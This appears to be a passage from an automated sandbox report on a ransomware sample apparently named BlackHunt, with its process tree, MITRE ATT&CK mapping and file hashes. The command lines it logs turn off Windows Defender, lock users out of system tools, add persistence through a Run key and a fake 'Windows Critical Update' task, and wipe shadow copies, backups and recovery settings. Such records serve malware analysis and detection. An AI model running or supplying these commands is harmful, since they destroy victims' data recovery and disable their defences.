C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2176
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:4544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:5016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:6380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:6420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:6412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:6448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:6400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:6388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:6512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3056
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:6604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:6660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:6640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:6596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4684
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:6788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe" /F2⤵PID:2460
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a27c8ab26a050674add24a25ae427a9065400f45cb9e5bd49f265e516c71f361.exe" /F3⤵
- Creates scheduled task(s)
PID:5388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:6648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2856
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:696
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5144
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5192
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5236
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1192
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2548
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2084
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6020
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5188
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6244
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3156
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:6796
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50898026776ef88e585ca11b214883b65
SHA149a48c618d13636847892f8675def9207fde13a4
SHA256868732e9485f9df110ecd7777e665b15c4ba087cef31f6b4dddb7bed6113c13e
SHA512e228a745131aca1fdb5f8da645c712182672f6671c3a3f6ffbdc2a08e838a2002cf191e734a14cc01559d52cab27e1084e873004e4849fdc6dd5902cc97f743f
-
Filesize
12KB
MD545d0a64b060b2792f290a76695f4abd5
SHA184bb9c414b1b370cda0a948fef7c48e5289496a1
SHA2567886952d04062a3c493a0c3363fc146c11ea617cbfc373ac43c0d278a00b0c9c
SHA512a9081776aeb6de2dbdca08fcb5ea8c55de76dedf46847b9af439ed6352eb226041bfba83a1c555784727476e68d4abc8b3babbbc1808b8b24f787eb70db47430
-
Filesize
684B
MD5bc30f086e41f8516a957244ad5ad7013
SHA1669604af4383b8cb0bdd5b0d6bbb7eabf91c931c
SHA256dbed3cc2adc640698f47e3b48b0f6fd834c296b3b20c4023391af440bbe575d1
SHA512c559039436526965d362e479466e63f88045134600fc5a69f2bebaa9efa493520f92b911d19e44d3b181dc99d6b614207a5515ff98d87af4556b7b51be9dd943